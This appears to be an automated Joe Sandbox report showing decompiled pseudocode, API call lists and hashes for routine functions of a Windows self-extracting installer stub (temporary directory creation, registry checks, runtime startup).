                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017453d
                                                                                                                                                                                                    0x00174554
                                                                                                                                                                                                    0x0017455a
                                                                                                                                                                                                    0x0017455a
                                                                                                                                                                                                    0x0017455a
                                                                                                                                                                                                    0x00174525
                                                                                                                                                                                                    0x0017468c

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00174518
                                                                                                                                                                                                    • MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00174554
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001745A3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000065), ref: 001745E3
                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000002), ref: 0017460D
                                                                                                                                                                                                    • MessageBeep.USER32(00000000), ref: 00174630
                                                                                                                                                                                                    • MessageBoxA.USER32(?,00000000,nst0dum,00000000), ref: 00174666
                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0017466F
                                                                                                                                                                                                      • Part of subcall function 0017681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0017686E
                                                                                                                                                                                                      • Part of subcall function 0017681F: GetSystemMetrics.USER32(0000004A), ref: 001768A7
                                                                                                                                                                                                      • Part of subcall function 0017681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001768CC
                                                                                                                                                                                                      • Part of subcall function 0017681F: RegQueryValueExA.ADVAPI32(?,00171140,00000000,?,?,0000000C), ref: 001768F4
                                                                                                                                                                                                      • Part of subcall function 0017681F: RegCloseKey.ADVAPI32(?), ref: 00176902
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                    • String ID: LoadString() Error. Could not load string resource.$nst0dum
                                                                                                                                                                                                    • API String ID: 3244514340-614204707
                                                                                                                                                                                                    • Opcode ID: a318399fc75832fb78ed41de0fb496638d0acc614c822d8c67be696c81c430b3
                                                                                                                                                                                                    • Instruction ID: f85875308435524c619868a2aee80910e45f5bb8b3e7a0968fe232b0bcef92ac
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a318399fc75832fb78ed41de0fb496638d0acc614c822d8c67be696c81c430b3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA51F372900219ABDB219F28CC48BBABB79EF85300F148194FD5DA7241DB71DE85CBA0
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E001753A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t5;
                                                                                                                                                                                                    				long _t13;
                                                                                                                                                                                                    				int _t14;
                                                                                                                                                                                                    				CHAR* _t20;
                                                                                                                                                                                                    				int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				CHAR* _t32;
                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t5 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                    				_t32 = __edx;
                                                                                                                                                                                                    				_t20 = __ecx;
                                                                                                                                                                                                    				_t29 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					E0017171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                    					_t34 = _t34 + 0x10;
                                                                                                                                                                                                    					_t29 = _t29 + 1;
                                                                                                                                                                                                    					E00171680(_t32, 0x104, _t20);
                                                                                                                                                                                                    					E0017658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                    					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                    					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                    					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(_t29 < 0x190) {
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					_t30 = 0;
                                                                                                                                                                                                    					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                    						_t30 = 1;
                                                                                                                                                                                                    						DeleteFileA(_t32);
                                                                                                                                                                                                    						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					return E00176CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                    				if(_t14 == 0) {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t30 = 1;
                                                                                                                                                                                                    				 *0x178a20 = 1;
                                                                                                                                                                                                    				goto L5;
                                                                                                                                                                                                    			}

















                                                                                                                                                                                                    0x001753ac
                                                                                                                                                                                                    0x001753b3
                                                                                                                                                                                                    0x001753b9
                                                                                                                                                                                                    0x001753bb
                                                                                                                                                                                                    0x001753bd
                                                                                                                                                                                                    0x001753bf
                                                                                                                                                                                                    0x001753d1
                                                                                                                                                                                                    0x001753d6
                                                                                                                                                                                                    0x001753e0
                                                                                                                                                                                                    0x001753e2
                                                                                                                                                                                                    0x001753f5
                                                                                                                                                                                                    0x001753fb
                                                                                                                                                                                                    0x00175402
                                                                                                                                                                                                    0x0017540b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175413
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175415
                                                                                                                                                                                                    0x00175416
                                                                                                                                                                                                    0x00175427
                                                                                                                                                                                                    0x0017542a
                                                                                                                                                                                                    0x0017542b
                                                                                                                                                                                                    0x00175434
                                                                                                                                                                                                    0x00175434
                                                                                                                                                                                                    0x0017543a
                                                                                                                                                                                                    0x0017544c
                                                                                                                                                                                                    0x0017544c
                                                                                                                                                                                                    0x00175452
                                                                                                                                                                                                    0x0017545a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017545e
                                                                                                                                                                                                    0x0017545f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0017171E: _vsnprintf.MSVCRT ref: 00171750
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001753FB
                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175402
                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017541F
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017542B
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175434
                                                                                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175452
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                    • API String ID: 1082909758-3862032828
                                                                                                                                                                                                    • Opcode ID: b28970800ce633c6244dd82ae4e0043b8b9c3862d3443cd04298f2b2423661c2
                                                                                                                                                                                                    • Instruction ID: d49f866618fd57224260ebdf820580ff6930cfb6cba856c9adfbcead43564315
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b28970800ce633c6244dd82ae4e0043b8b9c3862d3443cd04298f2b2423661c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1511017134050477E720AB2A9C49FAF3A7EEFD5321F408525B64ED2590DFB489C286A2
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 563 17256d-17257d 564 172583-172589 563->564 565 172622-172627 call 1724e0 563->565 567 17258b 564->567 568 1725e8-172607 RegOpenKeyExA 564->568 573 172629-17262f 565->573 572 172591-172595 567->572 567->573 569 1725e3-1725e6 568->569 570 172609-172620 RegQueryInfoKeyA 568->570 569->573 574 1725d1-1725dd RegCloseKey 570->574 572->573 575 17259b-1725ba RegOpenKeyExA 572->575 574->569 575->569 576 1725bc-1725cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E0017256D(signed int __ecx) {
                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				int _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                    				_t31 = 0;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t31 = E001724E0(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t34 = _t13 - 1;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                    						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                    							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                    							if(_t24 == 0) {
                                                                                                                                                                                                    								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                    								RegCloseKey(_v12); // executed
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t31 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00172572
                                                                                                                                                                                                    0x00172573
                                                                                                                                                                                                    0x00172575
                                                                                                                                                                                                    0x00172578
                                                                                                                                                                                                    0x0017257d
                                                                                                                                                                                                    0x00172627
                                                                                                                                                                                                    0x00172583
                                                                                                                                                                                                    0x00172586
                                                                                                                                                                                                    0x00172589
                                                                                                                                                                                                    0x001725eb
                                                                                                                                                                                                    0x00172607
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172609
                                                                                                                                                                                                    0x0017261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017258b
                                                                                                                                                                                                    0x0017258b
                                                                                                                                                                                                    0x0017259e
                                                                                                                                                                                                    0x001725b2
                                                                                                                                                                                                    0x001725ba
                                                                                                                                                                                                    0x001725cb
                                                                                                                                                                                                    0x001725d1
                                                                                                                                                                                                    0x001725d6
                                                                                                                                                                                                    0x001725da
                                                                                                                                                                                                    0x001725dd
                                                                                                                                                                                                    0x001725dd
                                                                                                                                                                                                    0x001725e3
                                                                                                                                                                                                    0x001725e3
                                                                                                                                                                                                    0x001725e3
                                                                                                                                                                                                    0x0017258b
                                                                                                                                                                                                    0x00172589
                                                                                                                                                                                                    0x0017262f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00174096,00174096,?,00171ED3,00000001,00000000,?,?,00174137,?), ref: 001725B2
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00174096,?,00171ED3,00000001,00000000,?,?,00174137,?,00174096), ref: 001725CB
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00171ED3,00000001,00000000,?,?,00174137,?,00174096), ref: 001725DD
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00174096,00174096,?,00171ED3,00000001,00000000,?,?,00174137,?), ref: 001725FF
                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00174096,00000000,00000000,00000000,00000000,?,00171ED3,00000001,00000000), ref: 0017261A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 001725C3
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 001725A8
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 001725F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                    • Opcode ID: e0db06eee4f6e41f45adb11b931637b21c22f3b9667b581e93518dd3c8bb50bd
                                                                                                                                                                                                    • Instruction ID: fca956e77341edc8e2509a1bb553029b278af1bd15ecb2a202682b7961b1ea0f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0db06eee4f6e41f45adb11b931637b21c22f3b9667b581e93518dd3c8bb50bd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB114F35946228BBDB209B919C0DDFFBEBCEF557A1F508055F80DE2050D7305E86D6A1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 577 176a60-176a91 call 177155 call 177208 GetStartupInfoW 583 176a93-176aa2 577->583 584 176aa4-176aa6 583->584 585 176abc-176abe 583->585 586 176aaf-176aba Sleep 584->586 587 176aa8-176aad 584->587 588 176abf-176ac5 585->588 586->583 587->588 589 176ac7-176acf _amsg_exit 588->589 590 176ad1-176ad7 588->590 591 176b0b-176b11 589->591 592 176b05 590->592 593 176ad9-176ae9 call 176c3f 590->593 595 176b13-176b24 _initterm 591->595 596 176b2e-176b30 591->596 592->591 597 176aee-176af2 593->597 595->596 598 176b32-176b39 596->598 599 176b3b-176b42 596->599 597->591 602 176af4-176b00 597->602 598->599 600 176b67-176b71 599->600 601 176b44-176b51 call 177060 599->601 604 176b74-176b79 600->604 601->600 610 176b53-176b65 601->610 605 176c39-176c3e call 17724d 602->605 608 176bc5-176bc8 604->608 609 176b7b-176b7d 604->609 612 176bd6-176be3 _ismbblead 608->612 613 176bca-176bd3 608->613 614 176b94-176b98 609->614 615 176b7f-176b81 609->615 610->600 616 176be5-176be6 612->616 617 176be9-176bed 612->617 613->612 619 176ba0-176ba2 614->619 620 176b9a-176b9e 614->620 615->608 618 176b83-176b85 615->618 616->617 617->604 623 176c1e-176c25 617->623 618->614 624 176b87-176b8a 618->624 621 176ba3-176bbc call 172bfb 619->621 620->621 621->623 630 176bbe-176bbf exit 621->630 626 176c27-176c2d _cexit 623->626 627 176c32 623->627 624->614 628 176b8c-176b92 624->628 626->627 627->605 628->618 630->608
                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed char _t41;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				E00177155();
                                                                                                                                                                                                    				_push(0x58);
                                                                                                                                                                                                    				_push(0x1772b8);
                                                                                                                                                                                                    				E00177208(__ebx, __edi, __esi);
                                                                                                                                                                                                    				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                    				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                    				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_t67 =  *0x1788b0 - _t58; // 0x2
                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                    						__eflags =  *0x1788b0; // 0x2
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							 *0x1781e4 = _t58;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0x1788b0 = _t58;
                                                                                                                                                                                                    							_t37 = E00176C3F(0x1710b8, 0x1710c4); // executed
                                                                                                                                                                                                    							__eflags = _t37;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                    						L00176FF4();
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t68 =  *0x1788b0 - _t58; // 0x2
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_push(0x1710b4);
                                                                                                                                                                                                    							_push(0x1710ac);
                                                                                                                                                                                                    							L00177202();
                                                                                                                                                                                                    							 *0x1788b0 = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                    							 *0x1788ac = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t71 =  *0x1788b4;
                                                                                                                                                                                                    						if( *0x1788b4 != 0 && E00177060(_t71, 0x1788b4) != 0) {
                                                                                                                                                                                                    							_t60 =  *0x1788b4; // 0x0
                                                                                                                                                                                                    							 *0x17a288(0, 2, 0);
                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00172BFB(0x170000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0x1781e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0x1781f8;
                                                                                                                                                                                                    							if( *0x1781f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0x1781e4;
                                                                                                                                                                                                    							if( *0x1781e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0x1781e0; // 0x80070002
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E0017724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00176a60
                                                                                                                                                                                                    0x00176a6a
                                                                                                                                                                                                    0x00176a6c
                                                                                                                                                                                                    0x00176a71
                                                                                                                                                                                                    0x00176a78
                                                                                                                                                                                                    0x00176a7f
                                                                                                                                                                                                    0x00176a85
                                                                                                                                                                                                    0x00176a8e
                                                                                                                                                                                                    0x00176a91
                                                                                                                                                                                                    0x00176a93
                                                                                                                                                                                                    0x00176a9c
                                                                                                                                                                                                    0x00176aa2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176aa6
                                                                                                                                                                                                    0x00176ab4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176aa8
                                                                                                                                                                                                    0x00176aaa
                                                                                                                                                                                                    0x00176aab
                                                                                                                                                                                                    0x00176aab
                                                                                                                                                                                                    0x00176abf
                                                                                                                                                                                                    0x00176abf
                                                                                                                                                                                                    0x00176ac5
                                                                                                                                                                                                    0x00176ad1
                                                                                                                                                                                                    0x00176ad7
                                                                                                                                                                                                    0x00176b05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176ad9
                                                                                                                                                                                                    0x00176ad9
                                                                                                                                                                                                    0x00176ae9
                                                                                                                                                                                                    0x00176af0
                                                                                                                                                                                                    0x00176af2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00176af4
                                                                                                                                                                                                    0x00176af4
                                                                                                                                                                                                    0x00176afb
                                                                                                                                                                                                    0x00176afb
                                                                                                                                                                                                    0x00176af2
                                                                                                                                                                                                    0x00176ac7
                                                                                                                                                                                                    0x00176ac7
                                                                                                                                                                                                    0x00176ac9
                                                                                                                                                                                                    0x00176b0b
                                                                                                                                                                                                    0x00176b0b
                                                                                                                                                                                                    0x00176b11
                                                                                                                                                                                                    0x00176b13
                                                                                                                                                                                                    0x00176b18
                                                                                                                                                                                                    0x00176b1d
                                                                                                                                                                                                    0x00176b24
                                                                                                                                                                                                    0x00176b24
                                                                                                                                                                                                    0x00176b30
                                                                                                                                                                                                    0x00176b39
                                                                                                                                                                                                    0x00176b39
                                                                                                                                                                                                    0x00176b3b
                                                                                                                                                                                                    0x00176b42
                                                                                                                                                                                                    0x00176b57
                                                                                                                                                                                                    0x00176b5f
                                                                                                                                                                                                    0x00176b65
